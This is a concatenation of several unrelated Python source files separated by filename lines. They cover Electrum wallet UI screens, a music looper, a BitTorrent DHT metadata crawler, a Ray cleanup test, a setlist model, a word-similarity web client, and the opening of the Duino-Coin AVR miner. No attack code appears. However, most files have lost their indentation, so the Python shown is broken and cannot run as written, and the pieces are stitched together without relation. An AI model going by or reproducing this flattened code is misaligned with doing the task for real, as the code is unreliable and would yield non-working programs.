for req in invoices:
key = req['key']
self.app.wallet.delete_invoice(key)
self.update()
n = len(invoices)
d = Question(_('Delete {} invoices?').format(n), callback)
d.open()
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.amount
if amount:
a, u = self.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.address, amount, self.message)
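    # Worked example (illustrative): with base unit "mBTC" (decimal_point == 5),
    # an amount string of "1.5 mBTC" becomes Decimal("1.5") * 10**5 = 150000 sat,
    # which is the integer amount create_bip21_uri expects.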
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('message') or req.get('memo', '') # TODO: a db upgrade would be needed to simplify that.
status, status_str = get_request_status(req)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_sorted_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
requests = self.app.wallet.get_sorted_requests()
if not requests:
return
def callback(c):
if c:
for req in requests:
key = req.get('rhash') or req['address']
self.app.wallet.delete_request(key)
self.update()
n = len(requests)
d = Question(_('Delete {} requests?').format(n), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
looper.py
|
"""A Looper mode for detecting and looping over a particular section."""
import OSC
import threading
import time
from Psc2.modes import mode
class Looper(mode.Mode):
"""A Looper Mode that can loop over a set of pre-defined sections.
It will start playback of the loop upon demand. The tempo can be set via
calls to set_tempo().
"""
def __init__(self,
client,
playback_notes,
eigths_per_tap=2,
eigth_duration = 0.5,
stop_midi_in=True):
"""Creates a Looper object.
        Args:
          client: OSCClient, used to send messages for playback.
          playback_notes: list of lists of tuples; each tuple holds a note pitch,
            the number of eighth notes until the next onset, and the note
            duration (in eighth notes), defining a part to be looped over.
          eigths_per_tap: int, the number of eighth notes per tap when setting
            the tempo.
          eigth_duration: float, initial duration of one eighth note in seconds.
          stop_midi_in: bool, when True will stop receiving MIDI notes while the
            looper is active.
        """
self.client = client
self.repetitions_passed = 0
self.playback_notes = playback_notes
self.last_tap_onset = None
self.start_averaging = False
self.eigths_per_tap = eigths_per_tap
self.mistake_count = 0
self.cumulative_times = 0.
self.eigth_duration = eigth_duration
self.last_time = 0.
self.eigths_passed = 1
self.avg_velocity = 80.
self.playing = False
self.loop_num = 0
self.stop_midi_in = stop_midi_in
def start_looper_thread(self):
"""Start playing back the loop in a separate thread."""
def play_loop():
while True:
if self.loop_num >= len(self.playback_notes):
self.playing = False
self.terminate_loop = False
if self.stop_midi_in:
msg = OSC.OSCMessage()
msg.setAddress('/enablethru')
self.client.send(msg)
break
self.play()
if self.stop_midi_in:
msg = OSC.OSCMessage()
msg.setAddress('/disablethru')
self.client.send(msg)
self.playing = True
play_thread = threading.Thread(target = play_loop)
play_thread.start()
def set_tempo(self):
"""Set the tempo by tapping."""
if self.last_tap_onset is None:
self.last_tap_onset = time.time()
return
curr_time = time.time()
time_delta = curr_time - self.last_tap_onset
self.last_tap_onset = curr_time
if self.start_averaging:
self.eigth_duration += time_delta / self.eigths_per_tap
self.eigth_duration /= 2
else:
self.start_averaging = True
self.eigth_duration = time_delta / self.eigths_per_tap
def increment_loop(self):
self.loop_num += 1
def play(self):
"""Play the stored pattern in sequence.
Uses the average note duration and velocity for all notes.
"""
for note, next_onset, duration in self.playback_notes[self.loop_num]:
msg = OSC.OSCMessage()
msg.setAddress('/playthru')
msg.append([note, int(self.avg_velocity)])
self.client.send(msg)
time.sleep(duration * self.eigth_duration)
msgoff = OSC.OSCMessage()
msgoff.setAddress('/stopthru')
msgoff.append([note, int(self.avg_velocity)])
self.client.send(msgoff)
if next_onset > duration:
time.sleep((next_onset - duration) * self.eigth_duration)
def process_note(self, note, velocity):
"""This Mode doesn't do any incoming note processing."""
pass
def process_note_off(self, note, velocity):
"""This Mode doesn't do any incoming note processing."""
pass
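# --- Illustrative usage sketch (not part of the original module) ---
# Assumes an OSC server handling /playthru and /stopthru is listening on
# 127.0.0.1:57120; the address, pitches and durations below are placeholder
# values, not taken from this repository.
def _example_loop_playback():
    client = OSC.OSCClient()
    client.connect(('127.0.0.1', 57120))
    # One looped section: (pitch, eighths until next onset, duration in eighths)
    part = [[(60, 2, 1), (64, 2, 1), (67, 4, 2)]]
    looper = Looper(client, part, eigths_per_tap=2, eigth_duration=0.5)
    looper.set_tempo()   # first tap only records the onset time
    time.sleep(0.5)
    looper.set_tempo()   # 0.5 s between taps / 2 eighths per tap -> 0.25 s per eighth
    looper.start_looper_thread()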
|
tor-spider.py
|
import pymysql.cursors
from maga import Maga
from struct import pack,unpack
from time import sleep, time
import time
from queue import Queue
import asyncio
import threading
import socket
import signal
import requests
import json
import os
import base64
import bencoder
import math
from pybloom_live import ScalableBloomFilter, BloomFilter
from elasticsearch import Elasticsearch
from bs4 import BeautifulSoup as bs
es = Elasticsearch("localhost:9200")
connect = pymysql.Connect(
host='localhost',
port=3306,
user='guest',
passwd='xxx',
db='dht_spider',
charset='utf8')
cursor = connect.cursor()
BT_PROTOCOL = "BitTorrent protocol"
BT_MSG_ID = 20
EXT_HANDSHAKE = 0
infoQueue = Queue(maxsize=100000)
bloom = ScalableBloomFilter(initial_capacity=100, error_rate=0.001)
class Crawler(Maga):
def random_node_id(self,size):
return os.urandom(size)
def check_country(self,ip):
if ip:
try:
data = requests.get("https://sp0.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query="+ip+"&co=&resource_id=6006&t=1586779286008&ie=utf8&oe=gbk&cb=op_aladdin_callback&format=json&tn=baidu&cb=jQuery1102024254573672262314_1586779227570&_=1586779227662",timeout=5)
if data.status_code == 200:
content = str(data.content,encoding= "gbk")
if content.find('电信')+1 or content.find('联通')+1 or content.find('移动')+1 or content.find('香港')+1 or content.find('台湾')+1 or content.find('日本')+1 or content.find('韩国')+1:
print(content)
return True
return True
except Exception as e:
print(e)
return False
return False
async def handle_announce_peer(self,infohash,addr,peer_addr):
print(infohash)
'''
sql = "INSERT INTO torrent_info(infohash,addr) values('%s','%s','%s')"
data = (infohash,addr[0],addr[1])
cursor.execute(sql % data)
connect.commit()
'''
if True:#self.check_country(peer_addr[0]):
if infoQueue.qsize() <= 5000 and (infohash not in bloom):
print('bloom ok')
infoQueue.put((infohash,peer_addr))
bloom.add(infohash)
else:
pass
async def handle_get_peers(self,infohash,addr):
#print(infohash)
'''
sql = "INSERT INTO torrent_info(infohash,addr) values('%s','%s','%s')"
data = (infohash,addr[0],addr[1])
cursor.execute(sql % data)
connect.commit()
'''
#if self.check_country(addr[0]):
#infoQueue.put((infohash,addr[0]))
if True:#self.check_country(peer_addr[0]):
if infoQueue.qsize() <= 5000 and (infohash not in bloom):
print('bloom ok')
infoQueue.put((infohash,addr))
bloom.add(infohash)
else:
pass
def send_packet(self,_socket,msg):
if type(msg) == bytes:
_socket.send(msg)
else:
_socket.send(msg.encode())
        packet = _socket.recv(4096)  # 4096-byte receive buffer (4069 in the original looks like a typo)
return packet
def send_ext_message(self,_socket,msg):
msgLen = pack(">I",len(msg))
msg = msgLen+msg
packet = self.send_packet(_socket,msg)
return packet
def send_handshake(self,_socket,infohash):
bt_header = chr(len(BT_PROTOCOL)) + BT_PROTOCOL
bt_ext_byte = "\x00\x00\x00\x00\x00\x10\x00\x00"
peerId = self.random_node_id(20)
infohash = base64.b16decode(infohash)
msg = bt_header.encode() + bt_ext_byte.encode() + infohash + peerId
packet = self.send_packet(_socket,msg)
return packet
def check_handshake(self,packet,myHash):
print('check handshake')
try:
bt_header_len, packet = ord(packet[:1]), packet[1:]
if bt_header_len != len(BT_PROTOCOL):
print('header len error')
return False
except TypeError:
print('TypeError')
return False
bt_header, packet = packet[:bt_header_len], packet[bt_header_len:]
if not bt_header.decode() == BT_PROTOCOL:
print(bt_header)
print(BT_PROTOCOL.encode())
print('header error')
return False
packet = packet[8:]
infohash = packet[:20]
myHash = base64.b16decode(myHash)
if not infohash == myHash:
print(infohash)
print(myHash)
print('infohash uncorrent')
print(packet)
return False
return True
def send_ext_handshake(self,_socket):
msg = chr(BT_MSG_ID).encode() + chr(EXT_HANDSHAKE).encode() + bencoder.bencode({"m":{"ut_metadata":1}})
packet = self.send_ext_message(_socket,msg)
return packet
def request_metadata(self,_socket,extHandShakeId,piece):
msg = chr(BT_MSG_ID).encode() + chr(extHandShakeId).encode() + bencoder.bencode({"msg_type":0,"piece":piece})
packet = self.send_and_recv_all(_socket,msg)
return packet
    def parse_ut_metadata(self,data):
        metaData = "_metadata".encode()
        found = data.find(metaData)
        if found == -1:
            # peer did not announce a ut_metadata id; fall back to extension id 2
            return 2
        index = found + len(metaData) + 1
        # data[index] is the byte value of the ASCII digit, so convert it to its numeric value
        return int(chr(data[index]))
def parse_metadata_size(self,packet):
_metadata_size = "metadata_size"
size_index = packet.index(_metadata_size.encode())+1
packet = packet[size_index:]
ut_metadata_size = packet[len(_metadata_size):packet.index('e1'.encode())]
#print(ut_metadata_size.decode())
return int(ut_metadata_size.decode())
def send_and_recv_all(self,_socket,msg,timeout = 5):
msgLen = pack(">I",len(msg))
msg = msgLen+msg
_socket.send(msg)
total = b''
while True:
try:
data = _socket.recv(1024)
if data:
total = total + data
except socket.timeout as e:
print(str(e))
break
return total
    def decode(self, data):
        # try a few common encodings and return the first successful decode
        result = ''
        for enc in ('utf-8', 'gbk', 'GB2312', 'ascii'):
            try:
                result = data.decode(enc)
                break
            except Exception:
                continue
        return result
def download_metadata(self,timeout=10):
print('download-thread')
while True:
infohash,address = infoQueue.get()
            success = self.request_magnet_page(infohash)
            if success:
                continue
            success2 = self.request_magnet_page_2(infohash)
            if success2:
                continue
            # the peer-wire download below is currently disabled by this `continue`
            continue
_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
metadata = b""
try:
_socket.settimeout(timeout)
_socket.connect((address[0],address[1]))
packet = self.send_handshake(_socket,infohash)
isCorrent = self.check_handshake(packet,infohash)
if not isCorrent:
print(packet)
print('Uncorrent Handshake')
continue
packet = self.send_ext_handshake(_socket)
ut_metadata = self.parse_ut_metadata(packet)
metadata_size = self.parse_metadata_size(packet)
for piece in range(int(math.ceil(metadata_size/(16*1024)))):
                    # use the extension id the peer announced (was hardcoded to 2)
                    packet = self.request_metadata(_socket, ut_metadata, piece)
index = packet.find('ee'.encode())
if index != -1:
packet = packet[index+2:]
metadata = metadata + packet
except Exception as e:
print('Error '+str(e)+' on :'+str(address[0])+":"+str(address[1]))
pass
finally:
_socket.close()
if metadata :
print('Done '+infohash)
info = self.parse_metadata(metadata)
if info:
name = info["name"]
self.save_metadata(infohash,name,address,str(info))
    def parse_metadata(self, data):  # parse the downloaded torrent metadata
info = {}
self.encoding = 'utf8'
try:
            torrent = bencoder.bdecode(data)  # decode the bencoded metadata
if not torrent.get(b'name'):
return None
except:
return None
detail = torrent
info['name'] = detail.get(b'name')
if b'files' in detail:
info['files'] = []
for x in detail[b'files']:
if b'path.utf-8' in x:
v = {'path': b'/'.join(x[b'path.utf-8']).decode('utf-8', 'ignore'), 'length': x[b'length']}
else:
v = {'path': b'/'.join(x[b'path']).decode('utf-8','ignore'), 'length': x[b'length']}
if b'filehash' in x:
v['filehash'] = base64.b16encode(x[b'filehash'])
info['files'].append(v)
info['length'] = sum([x['length'] for x in info['files']])
else:
info['length'] = detail[b'length']
info['data_hash'] = base64.b16encode(detail[b'pieces']) #hashlib.md5(detail[b'pieces']).hexdigest()
return info
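    # Illustrative return value (field names from the code above; values made up):
    #   {'name': b'Example Torrent',
    #    'files': [{'path': 'dir/file.bin', 'length': 1048576}],
    #    'length': 1048576, 'data_hash': b'...'}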
def save_metadata(self,infohash,name,address,info):
sql = "insert into torrent_metadata(info_hash,address,name,info,magnet,update_time) values(%s,%s,%s,%s,%s,%s)"
magnet = 'magnet:?xt=urn:btih:' + infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
connect.ping(reconnect=True)
cursor.execute(sql,(infohash,address[0],name,info,magnet,updatetime))
connect.commit()
def request_magnet_page_2(self,infohash):
url = 'https://btman.pw/zh-cn/magnet/'
while True:
targetUrl = url+str(infohash)
try:
response = requests.get(targetUrl,timeout=7)
if response.status_code == 200:
html = response.text
soup = bs(html,'lxml')
name = soup.select('h2')[0].get_text()
print(name)
size = soup.select('.info-table td')[3].get_text()
count = 1
print(size)
magnet = 'magnet:?xt=urn:btih:'+infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#data = {'name':name,'info_hash':infohash,'size':size,'magnet':magnet,'update_time':updatetime}
#es.index(index='torrent',doc_type='all_type',body=data,id=None)
torrentsql = 'insert into torrent_metadata(name,info_hash,size,magnet,update_time) value(%s,%s,%s,%s,%s)'
connect.ping(reconnect=True)
cursor.execute(torrentsql,(name,infohash,size,magnet,updatetime))
connect.commit()
print('Save :'+infohash)
return True
else:
print('Not found :'+infohash)
return False
except Exception as e:
print('Fail :'+str(e)+' in '+infohash)
print('Start Peer wire...')
return False
def request_magnet_page(self,infohash):
url = 'http://bq1.pw/magnet/'
while True:
targetUrl = url+str(infohash)
try:
response = requests.get(targetUrl,timeout=7)
if response.status_code == 200:
html = response.text
soup = bs(html,'lxml')
name = soup.select('h5')[0].get_text()
print(name)
size = soup.select('.att-c')[1].get_text()
count = soup.select('.att-c')[2].get_text()
print(size)
files = []
for path in soup.select('.striped .path'):
files.append(path.get_text())
print(files)
if len(files) >1:
files = '/'.join(files)
else:
files = files[0]
magnet = 'magnet:?xt=urn:btih:'+infohash
updatetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#data = {'name':name,'info_hash':infohash,'size':size,'magnet':magnet,'paths':files,'update_time':updatetime}
#es.index(index='torrent',doc_type='metadata',body=data,id=None)
torrentsql = 'insert into torrent_metadata(name,info_hash,size,magnet,paths,update_time) value(%s,%s,%s,%s,%s,%s)'
connect.ping(reconnect=True)
cursor.execute(torrentsql,(name,infohash,size,magnet,files,updatetime))
connect.commit()
print('Save :'+infohash)
return True
else:
print('Not found :'+infohash)
return False
except Exception as e:
print('Fail :'+str(e)+' in '+infohash)
print('Start Peer wire...')
return False
def run(self, port=6881):
coro = self.loop.create_datagram_endpoint(
lambda: self, local_addr=('0.0.0.0', port)
)
transport, _ = self.loop.run_until_complete(coro)
for signame in ('SIGINT', 'SIGTERM'):
try:
self.loop.add_signal_handler(getattr(signal, signame), self.stop)
except NotImplementedError:
# SIGINT and SIGTERM are not implemented on windows
pass
for i in range(20):
threading.Thread(target=self.download_metadata).start()
for node in self.bootstrap_nodes:
# Bootstrap
self.find_node(addr=node, node_id=self.node_id)
asyncio.ensure_future(self.auto_find_nodes(), loop=self.loop)
self.loop.run_forever()
self.loop.close()
crawler = Crawler()
crawler.run(6881)
|
monitor_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import subprocess
import time
import unittest
import ray
class MonitorTest(unittest.TestCase):
def _testCleanupOnDriverExit(self, num_redis_shards):
stdout = subprocess.check_output([
"ray",
"start",
"--head",
"--num-redis-shards",
str(num_redis_shards),
]).decode("ascii")
lines = [m.strip() for m in stdout.split("\n")]
init_cmd = [m for m in lines if m.startswith("ray.init")]
self.assertEqual(1, len(init_cmd))
redis_address = init_cmd[0].split("redis_address=\"")[-1][:-2]
def StateSummary():
obj_tbl_len = len(ray.global_state.object_table())
task_tbl_len = len(ray.global_state.task_table())
func_tbl_len = len(ray.global_state.function_table())
return obj_tbl_len, task_tbl_len, func_tbl_len
def Driver(success):
success.value = True
# Start driver.
ray.init(redis_address=redis_address)
summary_start = StateSummary()
if (0, 1) != summary_start[:2]:
success.value = False
# Two new objects.
ray.get(ray.put(1111))
ray.get(ray.put(1111))
if (2, 1, summary_start[2]) != StateSummary():
success.value = False
@ray.remote
def f():
ray.put(1111) # Yet another object.
return 1111 # A returned object as well.
# 1 new function.
if (2, 1, summary_start[2] + 1) != StateSummary():
success.value = False
ray.get(f.remote())
if (4, 2, summary_start[2] + 1) != StateSummary():
success.value = False
ray.worker.cleanup()
success = multiprocessing.Value('b', False)
driver = multiprocessing.Process(target=Driver, args=(success, ))
driver.start()
# Wait for client to exit.
driver.join()
time.sleep(5)
# Just make sure Driver() is run and succeeded. Note(rkn), if the below
# assertion starts failing, then the issue may be that the summary
# values computed in the Driver function are being updated slowly and
# so the call to StateSummary() is getting outdated values. This could
# be fixed by looping until StateSummary() returns the desired values.
self.assertTrue(success.value)
# Check that objects, tasks, and functions are cleaned up.
ray.init(redis_address=redis_address)
# The assertion below can fail if the monitor is too slow to clean up
# the global state.
self.assertEqual((0, 1), StateSummary()[:2])
ray.worker.cleanup()
subprocess.Popen(["ray", "stop"]).wait()
def testCleanupOnDriverExitSingleRedisShard(self):
self._testCleanupOnDriverExit(num_redis_shards=1)
def testCleanupOnDriverExitManyRedisShards(self):
self._testCleanupOnDriverExit(num_redis_shards=5)
self._testCleanupOnDriverExit(num_redis_shards=31)
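# A minimal sketch (not part of the original tests) of the polling approach the
# note inside _testCleanupOnDriverExit suggests: instead of sleeping a fixed
# amount, loop until the summary function reports the expected (object, task)
# counts or a timeout expires. `expected`, `timeout` and `interval` are
# illustrative parameters.
def wait_for_state_summary(state_summary, expected, timeout=30, interval=0.5):
    deadline = time.time() + timeout
    while time.time() < deadline:
        if state_summary()[:2] == expected:
            return True
        time.sleep(interval)
    return False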
if __name__ == "__main__":
unittest.main(verbosity=2)
|
setlist.py
|
from concurrent.futures import ThreadPoolExecutor
from threading import Thread
from typing import Any, Iterable
from pydantic import BaseModel
from playbacker.audiofile import AudioFile
from playbacker.song import Song
class Setlist(BaseModel):
name: str
songs: list[Song]
preloaded: bool = False
def _collect_audiofiles(self) -> Iterable[AudioFile]:
for song in self.songs:
if song.tracks.multitrack:
yield song.tracks.multitrack
if song.tracks.guide:
yield song.tracks.guide
def _preload_songs_in_pool(self) -> None:
def func(audiofile: AudioFile):
def inner():
audiofile.data
return inner
with ThreadPoolExecutor(5) as pool:
for audiofile in self._collect_audiofiles():
pool.submit(func(audiofile))
self.preloaded = True
def preload_songs(self) -> None:
Thread(target=self._preload_songs_in_pool, daemon=True).start()
def _get_song_idx(self, song: Song) -> int:
try:
return self.songs.index(song)
except ValueError:
return -1
def previous(self, song: Song) -> Song | None:
idx = self._get_song_idx(song)
return self.songs[idx - 1]
def next(self, song: Song) -> Song:
idx = self._get_song_idx(song)
try:
return self.songs[idx + 1]
except IndexError:
return self.songs[0]
def _find_song_in_storage(name: str, storage: list[Song]):
for song in storage:
if song.name == name:
return song
raise RuntimeError(f'Song "{name}" is not present in storage')
class _FileSetlist(BaseModel):
__root__: list[str]
def load_setlist(name: str, content: Any, songs: list[Song]) -> Setlist:
fsetlist = _FileSetlist(__root__=content)
selected_songs = [_find_song_in_storage(n, songs) for n in fsetlist.__root__]
return Setlist(name=name, songs=selected_songs)
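# Illustrative usage (an assumption, not from this repo): `content` is expected
# to be a JSON-style list of song names, validated through _FileSetlist, e.g.
#
#   all_songs = [...]  # Song objects loaded elsewhere
#   setlist = load_setlist("sunday", ["Amazing Grace", "Oceans"], all_songs)
#   setlist.preload_songs()  # warms up the audio files in a background thread
#
# Unknown names raise RuntimeError via _find_song_in_storage.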
|
wordSimilarity.py
|
import urllib.request
import sys
import json
import math
from urllib.parse import quote
from threading import Thread
class WordSimilarity:
scoreDictionary = {}
scoreDictionary['esa'] = 0
scoreDictionary['swoogle'] = 0
    # 1 - EasyESA client
    # a score of 1 or -1 indicates a perfect match
    # threshold values to consider: 0.07, 0.052 and 0.04
def getEasyESAScore(word1,word2):
WordSimilarity.scoreDictionary['esa'] = 0
url = "http://vmdeb20.deri.ie:8890/esaservice?task=esa&term1="+quote(word1)+'&term2='+quote(word2)
try:
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
score = str(response.read().decode('utf-8')).replace('\"','')
WordSimilarity.scoreDictionary['esa'] = float(score)
except Exception as e:
WordSimilarity.scoreDictionary['esa'] = 0
# 2 - ws4j client
def getWs4jScore(word1,word2):
url = "http://ws4jdemo.appspot.com/ws4j?measure=wup&args="+quote(word1)+"%3A%3A"+quote(word2)
request = urllib.request.Request(url)
request.add_header('Accept', 'application/json')
response = urllib.request.urlopen(request)
responseStr = response.read().decode('utf-8')
# fetch json from the response
jsonStr = json.loads(responseStr)
score = float(jsonStr['result'][0]['score'])
return score
# 3 - UMBC Semantic Similarity service
#
    # Documentation available at http://swoogle.umbc.edu/SimService/api.html
def getSwoogleScore(word1,word2):
WordSimilarity.scoreDictionary['swoogle'] = 0
url = "http://swoogle.umbc.edu/StsService/GetStsSim?operation=api&phrase1="+quote(word1)+'&phrase2='+quote(word2)
try:
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
score = str(response.read().decode('utf-8')).replace('\"','')
score = float(score)
WordSimilarity.scoreDictionary['swoogle'] = score
except Exception as e:
WordSimilarity.scoreDictionary['swoogle'] = 0
    # Currently combines EasyESA and the UMBC Swoogle service;
    # call method 2 (the ws4j client) if needed.
    # a score of 1 or -1 indicates a perfect match
    # threshold values to consider: 0.07, 0.052 and 0.04
def isPredicateSimilar(word1,word2):
#score = math.fabs(WordSimilarity.getEasyESAScore(word1,word2))
esaThread = Thread(target=WordSimilarity.getEasyESAScore, args=(word1,word2,))
swoogleThread = Thread(target=WordSimilarity.getSwoogleScore, args=(word1,word2,))
esaThread.start()
swoogleThread.start()
esaThread.join()
swoogleThread.join()
ESAscore = WordSimilarity.scoreDictionary['esa']
#WordSimilarity.getEasyESAScore(word1,word2)
ESAScaledScore = 0
if(ESAscore>0 and ESAscore<=0.04):
ESAScaledScore = 1
elif(ESAscore>0.04 and ESAscore<=0.06):
ESAScaledScore = 2
elif(ESAscore>0.07):
ESAScaledScore = 3
else:
ESAScaledScore = 0
SwoogleScore = WordSimilarity.scoreDictionary['swoogle']
# WordSimilarity.getSwoogleScore(word1,word2)
SwoogleScaledScore = 0
if(SwoogleScore>0 and SwoogleScore<0.6):
SwoogleScaledScore = 1
elif(SwoogleScore>=0.6 and SwoogleScore<0.7):
SwoogleScaledScore = 2
elif(SwoogleScore>=0.7):
SwoogleScaledScore = 3
else:
SwoogleScaledScore = 0
if(ESAScaledScore>SwoogleScaledScore):
score = ESAScaledScore
else:
score = SwoogleScaledScore
if(score>=2):
return score
else:
return -1
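# Illustrative usage (not part of the original module): isPredicateSimilar
# returns the larger of the two scaled scores (1-3) when it is at least 2,
# and -1 otherwise.
#
#   score = WordSimilarity.isPredicateSimilar('author', 'writer')
#   if score > 0:
#       print('similar (scaled score %d)' % score)
#   else:
#       print('not similar')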
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 3.1 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2022
"""
from os import _exit, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
import json
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
import zipfile
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
import base64 as b64
import os
import psutil
printlock = Semaphore(value=1)
# Python <3.6 check: this bare f-string raises a SyntaxError on older
# interpreters, surfacing the message below before anything else runs
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '3.1'
SOC_TIMEOUT = 15
REPORT_TIME = 120
AVR_TIMEOUT = 7 # diff 16 * 100 / 258 h/s = 6.2 s
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
TEMP_FOLDER = "Temp"
try:
        # Raspberry Pi users with a Latin-1 locale can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (osname != "nt"
or bool(osname == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
        # Some codecs also lack emoji support, for example Latin-1
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
        except UnicodeEncodeError:  # terminal can't render emoji, use the ASCII fallback
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
git_json = requests.get("https://api.github.com/repos/revoxhere/duino-coin/releases/latest")
data = json.loads(git_json.text) # Get latest version
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
running_script = False # If the process is from script
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print(get_string("updating"), "warning", "sys")
DATA_DIR = "Duino-Coin AVR Miner " + str(data["tag_name"]) # Create new version config folder
if not path.exists(DATA_DIR):
mkdir(DATA_DIR)
try :
config.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
